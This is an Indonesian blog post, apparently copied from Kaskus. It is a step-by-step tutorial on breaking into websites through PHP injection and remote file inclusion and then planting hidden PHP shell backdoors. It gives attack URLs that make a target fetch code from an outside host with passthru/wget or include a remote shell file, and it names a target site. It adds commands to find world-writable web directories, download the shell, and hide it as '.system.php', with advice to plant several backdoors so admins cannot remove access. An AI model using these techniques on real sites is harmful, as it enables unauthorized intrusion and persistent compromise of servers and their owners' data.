Zona baru untuk saling berbagi

Minggu, 20 Februari 2011

PHP Shell for Injecting website

Google Ads
1.Php Shell Injection

- Landasan Teori
PHP Shell Injection ( Injeksi PHP ) itu aPaan om?




PHP Shell Injection adalah sebuah tindakan untuk melakukan eksploitasi terhadap celah keamanan sebuah website dengan cara menginjeksi Shell hasil pengkodean bahasa PHP terhadap file yang terdapat pada website tersebut yang memiliki kelemahan ataupun kesalahan pemrograman/pengkodean. Tapi kalau orang kita biasa menyebutnya Nginjek Shell hehe… Yang saya maksud dengan PHP Shell Injection di sini adalah berbeda hal dengan PHP Injection. PHP Shell Injection yang akan saya bahas adalah tindak lanjut atau tahap eksploitasi selanjutnya dengan memanfaatkan bug PHP Injection ataupun Remote File Inclusion (RFI), yaitu pengeksploitasian sebuah target dengan media PHP Shell. Perhatikan perbedaannya :
PHP Injection, memasukan perintah-perintah shell langsung dengan menambahkan perintah PHP pada URL:



Quote:
http://www.target.com/[path]/page.php?action=exit.passthru($_GET[cok]);exit&cok=wgethttp://xXx*Forbidden*/xXx/r00t
Yang bertulisan tebal itu perintah PHP-nya sedangkan yang bertulisan miring adalah perintah shellnya.

PHP Shell Injection-nya :

Quote:
http://www.target.com/[path]/page.php?action=exit.include($_GET[cok]);exit&cok= [injekan??]
Remote File Inclusion (RFI), memasukan file yang berisi script PHP dari luar ke dalam target dengan memanfaatkan kesalahan statemen pengkodean PHP pada file di dalam target yang tidak terfilter dengan baik, misalnya bug ini :
Quote:
require_once($bcrm_pub_root . “/public_prepend.inc.php”)
PHP Shell Injection-nya :

- Saatnya Beraksi!
Setelah anda berhasil mendapatkan target berupa situs yang mempunyai kelemahan terhadap serangan RFI (Remote File Inclusion) dari proses scanning yang dilakukan oleh bot scan kamu sebelumnya, misalnya saja bot scan kamu menampilkan output seperti di bawah ini :

Nah dari url yang dikeluarkan oleh bot scan tersebut, kamu ambil/copy sampai ke tanda ’=’ (sama dengan) seperti pada gambar di atas (tulisan evil code-nya dibuang), lalu tambahkan di belakangnya (tanpa spasi) script PHP Shell yang mau dipakai untuk injeksi (PHP Shell Injector) dan diakhiri dengan tanda tanya ( ? ).
Lah mana PHP Shell Injector-nya??? Bagi donk!!!
Hare gene gak punya PHP Shell Injector….? hehehe.....
Oke kalo yang belum punya coba aja masuk ke irc server indoirc disana banyak yg scan minta aja kali dikasih, Kalau udah dapat semuanya, misalnya seperti ini :

- Target tadi:
- PHP Shell Injector:

http://geocities.com/gara_013/injek.txt???

Sekarang gabungkan keduanya jadi seperti ini :

Quote:
http://intruder.gmork.cz/forum//incl...hpbb_root_path[user]=http://h1.**Forbidden**/newbe/kambe.txt?
Jangan lupa tanda tanya dibelakangnya harus ditambahkan. Setelah itu paste-kan hasil di atas ke browser lalu jalankan. Kalo browser menampilkan hasil seperti di bawah ini atau mungkin mirip (PHP Injektor memiliki tampilan berbeda-beda), maka selamat buat kamu, kamu telah melakukan yang namanya PHP SHELL INJECTION!
Wew, yang ditampilkan di atas itu apa namanya sih?? Lalu apa gunanya?? Yang di atas itulah yang namanya shell. Shell adalah sebuah interface agar user dapat berkomunikasi dengan sistem komputer. Komunikasi yang terjadi yaitu user dapat mengetikan/menginput perintah-perintah khusus pada shell yang akan diterjemahkan pada komputer untuk dikerjakan.
Hanya saja shell seperti di atas sifatnya masih hanya remote dari luar server dan kalau celah keamanannya telah diketahui oleh adminnya dan ditutup, maka kamu nggak bisa lagi mengaksesnya.

Yahhh… ngapain juga repot-repot injek-injekan PHP segala kalo shell-nya gak tahan lama..!!!
Wew, tenang.. tenang… bisa kita akalin biar lebih awet. Segala permasalahan pasti ada pemecahannya. Pada tahap inilah kita harus melakukan apa yang orang Arab bilang PHP SHELL BACKDOORING.

2. PHP SHELL BACKDOORING (Menanam Backdoor PHP)

- Landasan Teori
Backdoor itu apa sih om?
Backdoor adalah sebuah program ataupun hasil pengkodean yang memungkinkan seseorang dapat mengakses secara remote komputer korban (tempat backdoor ditanam). Bisa disebut juga sebagai ’jalan belakang’ untuk masuk ke komputer korban tanpa harus melalui form login.
Jadi dengan backdoor, kita tidak lagi mengakses shell di target dari luar (PHP Injection) melalui vulnerability lain seperti pada awal tutorial ini. Kita akan dapat mengakses komputer korban sekalipun celah keamanan tadi pun telah ditutup oleh adminnya. Nah, dalam tutor ini backdoor yang kita gunakan adalah PHP Shell backdoor. Backdoor ini adalah PHP Shell Injector itu sendiri (gampang kan?). Kalau bisa biasakanlah memakai backdoor yang berupa PHP Shell sederhana saja, jangan yang berat dan kompleks sejenis C99 dan R57, karena sangat mudah bagi admin target untuk menemukannya. Logikanya begini, kalau orang lain (bukan admin) saja bisa menemukan dengan mudah backdoor C99 atau R57 melalui google, apalagi admin target itu sendiri kan? Dan biasakan juga menanam lebih dari satu backdoor di tempat yang berbeda-beda pada sebuah target, dengan begitu apabila satu backdoor dihapus oleh admin, masih ada backdoor lain yang belum tentu ketahuan.

- Saatnya Beraksi!
Pertama-tama kamu cari dulu directory yang mempunyai Permission 777 (Direktori yang dapat diakses/dibaca, dapat diubah/diedit, dapat dieksekusi) atau perizinan direktorinya drwx rwx rwx. (Readable, Writeable, eXecutable untuk semua group). Caranya dengan mengeksekusi perintah :

Quote:
find –perm –d /777
Namun, PHP backdoor ini tidak hanya membutuhkan direktori 777, tapi juga harus direktori yang sifatnya public, artinya direktori yang dapat diakses langsung lewat browser oleh semua orang. Ciri-ciri dari direktori ini yaitu pada path direktorinya ada tulisan seperti www, httdoc, httpd, html, public_html atau lain sebagainya. (Kalau emang public, dapat dites nantinya saat backdoor sudah terpasang). Coba liat hasil setelah menjalankan perintah di atas :
Setelah mendapatkan direktori tersebut misalnya salah satu direktori 777 yaitu /var/www/intruder/forum/db seperti di atas, langsung aja masuk/pindah ke direktori tersebut dengan mengeksekusi perintah ini :

Quote:
cd /var/www/intruder/forum/db
atau secara manual ketik aja di line direktori
Kalau sudah, sekarang tinggal mendownload/transfer file backdoor (PHP Injector tadi) ke dalam target. Caranya seperti biasa menggunakan wget atau lwp-download seperti ini :

kalo gak bisa coba lwp-download
Jika perintah itu sukses, maka lanjutkan dengan mengubah file PHP Shell tersebut, dalam hal ini kambe.txt menjadi file berekstensi PHP dengan perintah ini :

Quote:
mv kambe.txt.txt .system.php
Perintah tersebut akan mengubah file kambe.txt menjadi file hidden backdoor .system.php, dan seperti yang dijelaskan sebelumnya bahwa tanda titik di depan nama file tersebut menandakan/membuat file tersebut menjadi hidden. Dan sengaja diberinama .system.php biar gak terlalu mencurigakan. Kamu bisa lebih kreatif dengan membuat nama lain yang mirip dengan file-file yang ada di dalam direktori tersebut, jangan sampai terlihat perbedaan yang mencolok antara nama backdoor kamu dengan nama file-file lain di dalam target (Ninja Style).
Kalau semua sudah dilakukan tanpa error seperti langkah-langkah di atas, maka selamat, kamu telah melakukan Backdooring!
Horeee…2thumbup tapi gimana mengakses backdoor tadi om???
Teewwwww….
Oh iya… caranya adalah dengan mengakses alamat file backdoor tadi lewat browser .
Tapi alamat file backdoornya apa om???
Nah, alamat file backdoor tadi dapat diliat dengan cara :

- Liat direktori 777 tempat kamu menyimpan backdoor tadi :

/var/www/intruder/forum/db

- Nah itu artinya alamat (URL) backdoor tersebut adalah :

Mengapa di antara forum dan db garis miringnya double sedangkan pada direktori yang ada pada shell hanya 1 garis miring saja? Untuk menentukannya dapat dilihat dari URL PHP Injection tadi yang menyatakan setelah direktori forum akan diikuti garis miring double untuk mengakses direktori di bawahnya. Coba perhatikan lagi :

Quote:
http://intruder.gmork.cz/forum//incl...hpbb_root_path[user]=http://h1.**Forbidden**/newbe/kambe.txt?
Benar kan.. dua garis miring kan setelah forum. (Belajarlah mempertajam ketelitian dan analisa kamu)
Sekarang tinggal kamu tes aja mengkases backdoor tersebut dari browser. Kalo hasilnya mengeluarkan tampilan shell seperti atau mirip gambar di bawah ini (masing-masing PHP backdoor berbeda-beda tampilan sama halnya dengan perbedaan PHP Injector), berarti semua berjalan dengan lancar :
PHP Injection sudah. Backdooring sudah (Jangan lupa simpan URL backdoor kamu tadi). Sekarang kamu nggak perlu ngemis-ngemis lagi minta shell dari orang lain kayak tutor yang pertama karena kamu udah bisa memproduksi shell kamu sendiri.

sumber kaskus
Google Ads
Facebook Twitter Google+ Lintasme

Related Posts :

  • gratis pasang Banner Otomatishalaman ini disediakan bagi yang akan memasang banner secara gratis dan langsung tampil di halam bl…
  • Cara Install Drupal Cara Install Drupal Drupal adalah salah satu CMS ( Content mangement System) yang terkenal diduni…
  • Daftar Hostingan GratisIseng – iseng ngumpulin alamat url hostingan gratis. Copy paste dari blog temens yang ada ngasi inf…
  • Belajar tentang DrupalDrupal adalah sebuah konten open source sistem manajemen (CMS) atau platform yang menggunakan PHP…
  • Domain gratis dari smartdots.comIseng-iseng browsing cari domain gratis eh... ternyata menemukan smartdots.com. Situs ini menyediak…
 
Back To Top